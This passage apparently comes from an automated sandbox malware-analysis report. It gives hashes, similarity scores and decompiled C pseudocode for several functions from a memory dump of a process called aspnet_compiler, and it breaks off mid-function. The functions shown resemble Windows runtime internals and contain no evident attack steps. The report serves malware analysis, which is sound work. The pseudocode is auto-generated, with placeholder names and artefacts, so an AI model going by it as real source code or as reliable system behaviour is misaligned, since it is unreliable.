
API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 4271f428a4dcfbe6b27e4f17f9f31d04b2780989413052ce79225e1ea7bc0690
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 2631D4326047069BCB19DF28C880A5BB7A9FFC0210F04492DF5A387681DF35E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 011569A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E011569A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x11cd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L010E6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01156BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01119980() >= 0) {
							E010F2280(_t56, 0x11c8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x11c8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x11c8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E010DB6F0(0x10bc338, 0x10bc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01119520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E011195D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E010EFFB0(_t68, _t77, 0x11c8778);
				}
				_pop(_t78);
				return E0111B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x011569b5
0x011569be
0x011569c3
0x011569c9
0x011569cc
0x011569d1
0x011569d3
0x011569de
0x011569e1
0x011569ea
0x011569f6
0x011569fe
0x01156a13
0x01156a14
0x01156a15
0x01156a16
0x01156a1e
0x01156a26
0x01156a31
0x01156a36
0x01156a37
0x01156a40
0x01156a49
0x01156a4a
0x01156a53
0x01156a59
0x01156a5d
0x01156a5e
0x01156a64
0x01156a67
0x01156a6a
0x01156a6d
0x01156a70
0x01156a77
0x01156a7d
0x01156a86
0x01156a89
0x01156a9c
0x01156a9f
0x01156aa2
0x01156aa5
0x01156aaf
0x01156ab1
0x01156ab8
0x01156ab9
0x01156abb
0x01156abe
0x01156ac5
0x01156ac5
0x01156aaf
0x01156a40
0x01156a26
0x011569fe
0x01156ace
0x01156ad0
0x01156ad3
0x01156ad8
0x01156adf
0x01156adf
0x01156ae8
0x01156aef
0x01156aef
0x01156af9
0x01156b06

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587f18bebb93d09acaf09bbd0ef36789ec8c09cb39d9872daec42392d93b5cf2
Instruction ID: c76571bb0e6437f343cf436583bb3c13db31af1c959b7dbc6a74ff65943a7444
Opcode Fuzzy Hash: 587f18bebb93d09acaf09bbd0ef36789ec8c09cb39d9872daec42392d93b5cf2
Instruction Fuzzy Hash: 7C4180B1D00609DFDB18DFA9D940BFEBBF4EF48714F04812AE964A7244DB749905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010D5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E010D5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E010D52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011195D0();
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E010EEB70(_t54, 0x11c79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E011195D0();
								L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E010EEB70(_t54, 0x11c79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0111F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E010EEB70(_t54, 0x11c79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011195D0();
							L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x010d5220
0x010d5224
0x01130d13
0x01130d16
0x01130d19
0x010d522a
0x010d522a
0x010d522d
0x010d522d
0x010d5231
0x010d5235
0x010d5239
0x01130d5c
0x01130d62
0x00000000
0x00000000
0x01130d6a
0x01130d7b
0x01130d7f
0x01130d81
0x01130d84
0x01130d95
0x01130d95
0x01130d6c
0x01130d71
0x01130d71
0x01130d9a
0x00000000
0x010d524a
0x010d524a
0x010d5250
0x01130d24
0x01130d35
0x01130d39
0x01130d3b
0x01130d3e
0x01130d50
0x01130d50
0x01130d26
0x01130d2b
0x01130d2b
0x00000000
0x01130d55
0x010d5256
0x010d525b
0x010d5265
0x01130da7
0x010d526b
0x010d526e
0x010d5272
0x01130db1
0x01130db4
0x01130dc5
0x01130dc5
0x010d5272
0x010d5278
0x010d527e
0x010d528a
0x010d528c
0x010d528d
0x00000000
0x010d5280
0x010d5282
0x010d5288
0x010d529f
0x010d5292
0x00000000
0x010d5292
0x00000000
0x010d5288
0x010d527e

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9fdbb8aa1bcd73ee94678c9db59fc3b6c30de1fca0c6beeaf7e62d65eef55d
Instruction ID: 3b5fcec80c6e61e5790d18943b0dbbfe7cb4d852510ddb768e27a9753515fa6e
Opcode Fuzzy Hash: bb9fdbb8aa1bcd73ee94678c9db59fc3b6c30de1fca0c6beeaf7e62d65eef55d
Instruction Fuzzy Hash: 64312631241701DBC72AAB18CC45BBEB7F5FFA5760F11462AF9950B598E760E804CA90

Uniqueness

Uniqueness Score: -1.00%

Function 01113D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01113D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E010E7B60(0, _t61, 0x10b11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E010E7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L010F4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01113d4c
0x01113d50
0x01113d55
0x01113d5e
0x0114e79a
0x00000000
0x0114e79a
0x01113d68
0x0114e789
0x01113d9d
0x01113da3
0x01113daf
0x01113db5
0x01113dbc
0x01113dc4
0x01113dc9
0x01113dce
0x0114e7ae
0x0114e7ae
0x01113dde
0x01113de2
0x01113de7
0x01113e0d
0x01113e13
0x01113e16
0x01113e1e
0x01113e25
0x01113e28
0x00000000
0x00000000
0x01113e2a
0x01113e2f
0x01113e37
0x01113e37
0x00000000
0x01113e37
0x01113e31
0x00000000
0x01113e31
0x01113e20
0x01113e20
0x01113e35
0x00000000
0x01113de9
0x01113de9
0x01113de9
0x01113dee
0x01113dfd
0x01113dff
0x01113e02
0x01113e05
0x01113e05
0x00000000
0x01113df0
0x01113de7
0x0114e78f
0x0114e794
0x01113d79
0x01113d84
0x01113d89
0x01113d8e
0x00000000
0x0114e7a4
0x01113d96
0x01113d9a
0x00000000
0x01113d9a
0x00000000
0x0114e794
0x01113d6e
0x01113d73
0x00000000
0x0114e7b5
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc7bdac6ca50d3179bea0ad719c74913ef0f0995c16c05fd934f761975999ec5
Instruction ID: b6e377ec16e267492af9b071d0fe4b56e95bd1f28ed1c75a7792235365af223c
Opcode Fuzzy Hash: bc7bdac6ca50d3179bea0ad719c74913ef0f0995c16c05fd934f761975999ec5
Instruction Fuzzy Hash: 7E31EF31A15621DBDB2DCF2DC441A6AFBE4FF45720746807AE955CB358E730C840C792

Uniqueness

Uniqueness Score: -1.00%

Function 0110A61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0110A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x11b0220);
				E0112D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x11c7b9c; // 0x0
				_t55 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0112D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x11c7b10 =  *0x11c7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x11c536c; // 0x77e45368
					if( *_t51 != 0x11c5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x11c5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x11c536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0110A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0110a61c
0x0110a61e
0x0110a623
0x0110a628
0x0110a62b
0x0110a62d
0x0110a648
0x0110a64a
0x0110a64f
0x01149b44
0x0110a6ec
0x0110a6f1
0x0110a6f1
0x0110a655
0x0110a657
0x0110a65a
0x0110a65d
0x0110a662
0x0110a663
0x0110a667
0x0110a668
0x0110a66d
0x0110a706
0x0110a706
0x01149bda
0x01149be6
0x01149beb
0x00000000
0x01149beb
0x0110a679
0x01149b7a
0x00000000
0x01149b7a
0x0110a683
0x0110a6f4
0x0110a6f7
0x0110a6f9
0x0110a6fd
0x0110a6a0
0x0110a6a0
0x0110a6ad
0x0110a6af
0x0110a6b4
0x01149ba7
0x01149bac
0x00000000
0x00000000
0x01149bc6
0x01149bce
0x01149bd1
0x01149bd3
0x01149bd3
0x00000000
0x01149bd1
0x0110a6bd
0x0110a6c3
0x0110a6c6
0x0110a6d2
0x0110a701
0x0110a704
0x00000000
0x0110a704
0x0110a6d4
0x0110a6d6
0x0110a6d9
0x0110a6db
0x0110a6e1
0x0110a6e6
0x0110a6e8
0x0110a6e8
0x0110a6ea
0x00000000
0x0110a6ea
0x0110a688
0x0110a692
0x0110a694
0x0110a699
0x00000000
0x00000000
0x0110a69d
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95af67abfe37913034bfc3b3bf70dc611be86fd8915297e90cfb3ba1ac1d515f
Instruction ID: 790bd15e37b6452368518a334ec919b2d5d75ca86839b437ac16f5c91254e387
Opcode Fuzzy Hash: 95af67abfe37913034bfc3b3bf70dc611be86fd8915297e90cfb3ba1ac1d515f
Instruction Fuzzy Hash: B3416975E00309DFCB19CF58D890B9ABBF1BF89704F1581A9EA15AB384C7B5A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010FC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E010FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E010F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E011A8D34(_v8, _t80);
					}
					E010F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E010EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E011A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E010EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0111B180();
						if(_a4 != 0) {
							E010F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E010FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E010FBB2D(_t16, _t15);
						E010FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E010EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E010EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E010EFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x010fc18d
0x010fc18f
0x010fc191
0x010fc19b
0x010fc1a0
0x010fc1d4
0x010fc1de
0x01142d6e
0x010fc1e4
0x010fc1e4
0x010fc1e4
0x010fc1ec
0x01142d7d
0x01142d7d
0x010fc1f3
0x010fc1ff
0x01142d88
0x01142d8d
0x01142d94
0x01142d94
0x01142d9f
0x01142da4
0x01142dab
0x01142db0
0x01142db2
0x01142db3
0x01142db4
0x01142dbc
0x01142dc3
0x01142dc3
0x010fc205
0x010fc205
0x010fc208
0x010fc20e
0x010fc211
0x010fc216
0x010fc219
0x010fc21f
0x010fc222
0x010fc22c
0x010fc234
0x010fc23a
0x010fc23f
0x010fc245
0x010fc24b
0x010fc251
0x010fc25a
0x010fc276
0x010fc27d
0x010fc27d
0x010fc25c
0x010fc25c
0x00000000
0x010fc25e
0x010fc1a4
0x010fc1aa
0x010fc1b3
0x010fc265
0x010fc26c
0x010fc26c
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: f38a361d4757bb3da5caa7225802adbddf068af1cfbd429b86f59238635fef7f
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: A4314672A0154BBEE749EBB4C582BEDFBA4BF52204F08415ED69C47201CB346A55CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01157016 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E01157016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x11cd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01156B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01156B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E010F7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01119AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0111B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L010F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}

0x01157016
0x0115701e
0x0115702b
0x01157033
0x01157037
0x0115703c
0x0115703e
0x01157041
0x01157045
0x0115704a
0x01157050
0x01157055
0x0115705a
0x01157062
0x01157062
0x0115705a
0x01157064
0x01157064
0x01157067
0x01157071
0x01157096
0x0115709b
0x011570a2
0x011570a6
0x011570a7
0x011570ad
0x011570b3
0x011570b6
0x011570bb
0x011570c3
0x011570c3
0x011570c6
0x011570cd
0x011570dd
0x011570e0
0x011570e2
0x011570e2
0x011570ee
0x01157101
0x011570f0
0x011570f9
0x011570f9
0x0115710a
0x0115710e
0x01157112
0x01157117
0x01157118
0x01157118
0x011570bb
0x0115711d
0x01157123
0x01157131
0x01157131
0x01157136
0x0115713d
0x0115713e
0x0115713f
0x0115714a
0x0115714a
0x01157084
0x01157088
0x00000000
0x0115708e
0x0115708e
0x01157092
0x00000000
0x01157092

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 861a001c81d22b5a914ed613db1900adb5c364956188e4e829a1b413cb441640
Instruction ID: c8e5bbb704426f705f54ae171f81938310ef5e48d9aef011d39fc997aa71edf4
Opcode Fuzzy Hash: 861a001c81d22b5a914ed613db1900adb5c364956188e4e829a1b413cb441640
Instruction Fuzzy Hash: C431A472604751DFC325DF68C981A6AB7E5BF88700F444A2DFDA587690E730E904C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 01116DE6 Relevance: .1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01116DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
